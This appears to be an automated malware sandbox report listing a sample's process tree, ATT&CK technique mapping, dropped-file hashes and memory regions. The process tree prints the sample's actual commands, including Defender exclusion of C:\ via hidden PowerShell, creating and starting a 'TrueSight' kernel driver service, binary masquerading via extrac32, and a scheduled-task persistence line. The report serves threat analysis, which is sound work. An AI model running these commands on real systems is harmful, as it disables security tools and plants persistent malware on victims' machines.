    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4372
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WbckutgxF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1316
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4540
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4280
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
        9⤵
        
        PID:4076
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
        9⤵
        
        PID:1364
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
        9⤵
        
        PID:4760
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3556
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        10⤵
        Executes dropped EXE
        
        PID:1368
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2804
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif start TrueSight
        10⤵
        Executes dropped EXE
        
        PID:2624
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3588
        
        C:\Users\Public\aken.pif
        
        C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3600
      - C:\Users\Public\Libraries\xgtukcbW.pif
        
        C:\Users\Public\Libraries\xgtukcbW.pif
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\Trading_AIBot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Trading_AIBot.exe"
        7⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ACCApi'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4364
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /tn AccSys /tr "C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe" /st 15:43 /du 23:59 /sc daily /ri 1 /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5036
        
        C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe
        
        "C:\Users\Admin\AppData\Roaming\ACCApi\apihost.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\Microsofts.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsofts.exe"
        7⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2084
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4404

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
PID:5032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:4760

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:672

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:3588

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1476

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:4416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
663e21f33b0bc23d4c138c3d9fc249b3

SHA1
81f7b42de26946c0916553fd0b7adfa080f668bd

SHA256
e5341edc00ca1242e39952a532d8154da96126cbd40958e87b3930edbfc45cff

SHA512
3f4e6ff0207b1d304150d7950d786c5b9c398e7c2cc873bc6d0372369053536898a34f2d08f9f2eac64a94ece14c86ce5902307fe307e093c1ffd4c68d85d895

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.3MB

MD5
e94ee27b4a309bf5431ef63c3299165a

SHA1
52045c312e9867500e46f144466a197ce8e6b1c1

SHA256
05f202b3140cb5df492bd2df85ba20b7a0336c7119784314b37f621ecf837034

SHA512
5d5c714ee90a70bcf9d45fafe1c57c68edee03f5f50ed0fc79ddfa006613509a05e1da3d9a26a1c102e3a58e3d16ebcc9be45c770d586d4d32d9dd5abf35b3b8

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
59df10314256045ed511c8817f019d51

SHA1
d4c8aa822de04918fbbced394ab44c3a5cebbf20

SHA256
c99089277e1fe7c982e796dc06265e94381712aa8affbdab063dba99193212d1

SHA512
99b63ef8c4cc477f74d1b36f3db4da3e87ae88cc63907030409fedd5dee8dd4ccddc0cd9d45d461e29ecb2e98906c8fc54ead4ba701e7a09bed18ffdcb5296d7

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
84205ebc5ddc2f655428fbd359ef9f3d

SHA1
785d648a98c8e89ea865828204c82a46ffc595ab

SHA256
069a79221b6134bc5b08eea74e54b8c6a29881eb19f97159823701ab22d3c780

SHA512
b821551b5d65262aa3a2b58976b8e431d43078e98c5e011ee207aa055a9b2be31ee286e00d639579fada7789a6a4f7e84359a0cd6f26726e8260d5aeac8f80c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsofts.exe

Filesize
96KB

MD5
f6b8018a27bcdbaa35778849b586d31b

SHA1
81bde9535b07e103f89f6aeabdb873d7e35816c2

SHA256
ddc6b2bd4382d1ae45bee8f3c4bb19bd20933a55bdf5c2e76c8d6c46bc1516ce

SHA512
aa958d22952d27bad1c0d3c9d08ddbf364274363d5359791b7b06a5d5d91a21f57e9c9e1079f3f95d7ce5828dcd3e79914ff2bd836f347b5734151d668d935de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Trading_AIBot.exe

Filesize
69KB

MD5
e91a1db64f5262a633465a0aaff7a0b0

SHA1
396e954077d21e94b7c20f7afa22a76c0ed522d0

SHA256
f19763b48b2d2cc92e61127dd0b29760a1c630f03ad7f5055fd1ed9c7d439428

SHA512
227d7dad569d77ef84326e905b7726c722ceff331246de4f5cf84428b9721f8b2732a31401df6a8cef7513bcd693417d74cdd65d54e43c710d44d1726f14b0c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uc3frb13.veq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
1.3MB

MD5
9a9da347f57f4a7a00026c99bdf17556

SHA1
934f0bd5faa722c941dbc6b74ff52017f724d2f7

SHA256
4ac4c961b8134e824b3dcce4c4a7e2102df669d8b92bbdcb50e9ec2a60948cfd

SHA512
877598bedb0505a290104fe9f365d74a01db455f8a892b20f73eee5c4ff0f5a5f396ff409a5c332a44bff01bf74f73f26725add9d68b669a23cc15c6a84c2660

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
55KB

MD5
3c755cf5a64b256c08f9bb552167975c

SHA1
8c81ca56b178ffd77b15f59c5332813416d976d7

SHA256
12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

SHA512
8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

Download Submit
C:\Users\Public\Libraries\xgtukcbW.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\Upha.pif

Filesize
70KB

MD5
3fb5cf71f7e7eb49790cb0e663434d80

SHA1
b4979a9f970029889713d756c3f123643dde73da

SHA256
41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

SHA512
2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

Download Submit
C:\Users\Public\WbckutgxF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\aken.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\alpha.pif

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\df.cmd

Filesize
1.3MB

MD5
68c3d87b812a6bf691a4bb72fea98e48

SHA1
ec272240c32a93dcd938a1b658f3a63108faafbe

SHA256
4d6eeca95ac4497fb2272d38be3d9de4476fd94a15e674afa9534efe4aab1271

SHA512
a94930f3238e2d7e4708e9052f4e8a66cb4c1ab86f29a0bdcce444b2e5bce2d1b9dd733f88540ac2e67cacfc8f9b2af30bdb63357e37f3926688eee4ffc6b9f2

Download Submit
C:\Users\Public\ript.exe

Filesize
157KB

MD5
24590bf74bbbbfd7d7ac070f4e3c44fd

SHA1
cdfe517d07f18623778829aa98d6bbadd3f294cd

SHA256
ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

SHA512
ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

Download Submit
C:\Windows \SysWOW64\netutils.dll

Filesize
116KB

MD5
0f088756537e0d65627ed2ea392dcaae

SHA1
983eb3818223641c13464831a2baad9466c3750f

SHA256
abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

SHA512
d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Filesize
1.2MB

MD5
d03487537d195b58dc93fa9b39899e88

SHA1
36224a34ff85cce867882f755f4bf6675168b89a

SHA256
72ccf90fa7a8da1155f2f11d18264cea8cb0dc1b8f7cd2ad8a376f1c7101db7e

SHA512
df427603f30cbc615c2f9709029fc09e189723e614850e6dd25d0df9308c5a5c89fac90c90a4f6b343d11aea86ef2c6271c366b474f4904d01bb8ea3205d7242

Download Submit
C:\Windows\System32\FXSSVC.exe

Filesize
1.2MB

MD5
ef2ed1da61566b3eb2072325193d6278

SHA1
970419f524b087095aec0d38b84a2f941ca6689f

SHA256
362888a6ef3b40cfdb0b6bad89a4e3e1525bca3449872379662e4ae9face2dab

SHA512
d77f92d3f38acc86cac2e7035a7482e5604545ffa85e7a180cf6b3cbd10d78b1b130a6219c9b965d497b298f89b665cf4c6d363352e5f409c150eadffbc46b57

Download Submit
C:\Windows\System32\alg.exe

Filesize
1.2MB

MD5
1a624cabc78d0bab8235584195663cdc

SHA1
f59cb5f9cc6df3b610836559c4b35b74a32ae54e

SHA256
c1ec1e37ad2db8ba672315dfe549beadc3c686a7da437cc5b2dde64c75338840

SHA512
2dad15c91a44809869b709f84ca2fa3fceeaf1866d507387ad4d7ae0599bf367b3a85c2a9048820dd0441efb85e704c62e30500dc6fd56f9faf549249b0061af

Download Submit
C:\Windows\system32\AppVClient.exe

Filesize
1.3MB

MD5
b00b1ed3f25ab72ec259f90e0c682232

SHA1
755ee56f072368828b1b8bf41f964fcfd2e6cdbc

SHA256
e88ff81df3337ee3611f862e0caeb9cfd1529ee7897060858263235d70542687

SHA512
ab3dadb4be7d3f4a267ed2274b7ff354c62b826c7abba5ebae1fc13eddef0e7d3b7874658f92b365cc0927a1aa1df2b7e54d40618a420af3efe6ceddcf10ee59

Download Submit
memory/672-888-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/672-612-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/1476-679-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/1476-659-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/2084-698-0x0000000006070000-0x00000000060C0000-memory.dmp

Filesize
320KB

Download
memory/2084-884-0x0000000006430000-0x00000000065F2000-memory.dmp

Filesize
1.8MB

Download
memory/2084-660-0x00000000004D0000-0x00000000004EE000-memory.dmp

Filesize
120KB

Download
memory/2084-885-0x00000000063C0000-0x00000000063CA000-memory.dmp

Filesize
40KB

Download
memory/2084-662-0x0000000004DC0000-0x0000000004E5C000-memory.dmp

Filesize
624KB

Download
memory/2460-684-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/2460-599-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/3588-889-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/3588-638-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/3704-676-0x0000000004F40000-0x0000000004FD2000-memory.dmp

Filesize
584KB

Download
memory/3704-673-0x0000000000630000-0x0000000000648000-memory.dmp

Filesize
96KB

Download
memory/3972-515-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3972-663-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3972-540-0x000000001F690000-0x000000001F6D4000-memory.dmp

Filesize
272KB

Download
memory/3972-554-0x000000001FAE0000-0x0000000020084000-memory.dmp

Filesize
5.6MB

Download
memory/3972-555-0x000000001F910000-0x000000001F954000-memory.dmp

Filesize
272KB

Download
memory/4364-868-0x0000000007730000-0x00000000077D3000-memory.dmp

Filesize
652KB

Download
memory/4364-808-0x0000000005F10000-0x0000000005F76000-memory.dmp

Filesize
408KB

Download
memory/4364-867-0x0000000006B10000-0x0000000006B2E000-memory.dmp

Filesize
120KB

Download
memory/4364-799-0x0000000002C40000-0x0000000002C76000-memory.dmp

Filesize
216KB

Download
memory/4364-857-0x0000000073460000-0x00000000734AC000-memory.dmp

Filesize
304KB

Download
memory/4364-870-0x0000000007EC0000-0x000000000853A000-memory.dmp

Filesize
6.5MB

Download
memory/4364-871-0x0000000007880000-0x000000000789A000-memory.dmp

Filesize
104KB

Download
memory/4364-836-0x0000000006670000-0x00000000066BC000-memory.dmp

Filesize
304KB

Download
memory/4364-835-0x0000000006540000-0x000000000655E000-memory.dmp

Filesize
120KB

Download
memory/4364-872-0x00000000078F0000-0x00000000078FA000-memory.dmp

Filesize
40KB

Download
memory/4364-809-0x0000000005F80000-0x00000000062D4000-memory.dmp

Filesize
3.3MB

Download
memory/4364-856-0x00000000076F0000-0x0000000007722000-memory.dmp

Filesize
200KB

Download
memory/4364-875-0x0000000007B00000-0x0000000007B96000-memory.dmp

Filesize
600KB

Download
memory/4364-878-0x0000000007A80000-0x0000000007A91000-memory.dmp

Filesize
68KB

Download
memory/4364-880-0x0000000007AB0000-0x0000000007ABE000-memory.dmp

Filesize
56KB

Download
memory/4364-881-0x0000000007AC0000-0x0000000007AD4000-memory.dmp

Filesize
80KB

Download
memory/4364-882-0x0000000007BC0000-0x0000000007BDA000-memory.dmp

Filesize
104KB

Download
memory/4364-883-0x0000000007BA0000-0x0000000007BA8000-memory.dmp

Filesize
32KB

Download
memory/4364-807-0x0000000005D70000-0x0000000005DD6000-memory.dmp

Filesize
408KB

Download
memory/4364-805-0x00000000056A0000-0x00000000056C2000-memory.dmp

Filesize
136KB

Download
memory/4364-804-0x0000000005740000-0x0000000005D68000-memory.dmp

Filesize
6.2MB

Download
memory/4372-91-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-87-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-56-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-58-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-59-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-60-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-62-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-63-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-65-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-66-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-67-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-68-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-69-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-71-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-72-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-49-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-73-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-74-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-75-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-50-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-76-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-77-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-79-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-92-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-80-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-81-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-82-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-96-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-84-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-98-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-85-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-99-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-86-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-100-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-102-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-52-0x0000000000400000-0x0000000000549000-memory.dmp

Filesize
1.3MB

Download
memory/4372-54-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-104-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-90-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-107-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-55-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-108-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-93-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-94-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-95-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-111-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-83-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-97-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-101-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-103-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
memory/4372-57-0x0000000002970000-0x0000000003970000-memory.dmp

Filesize
16.0MB

Download
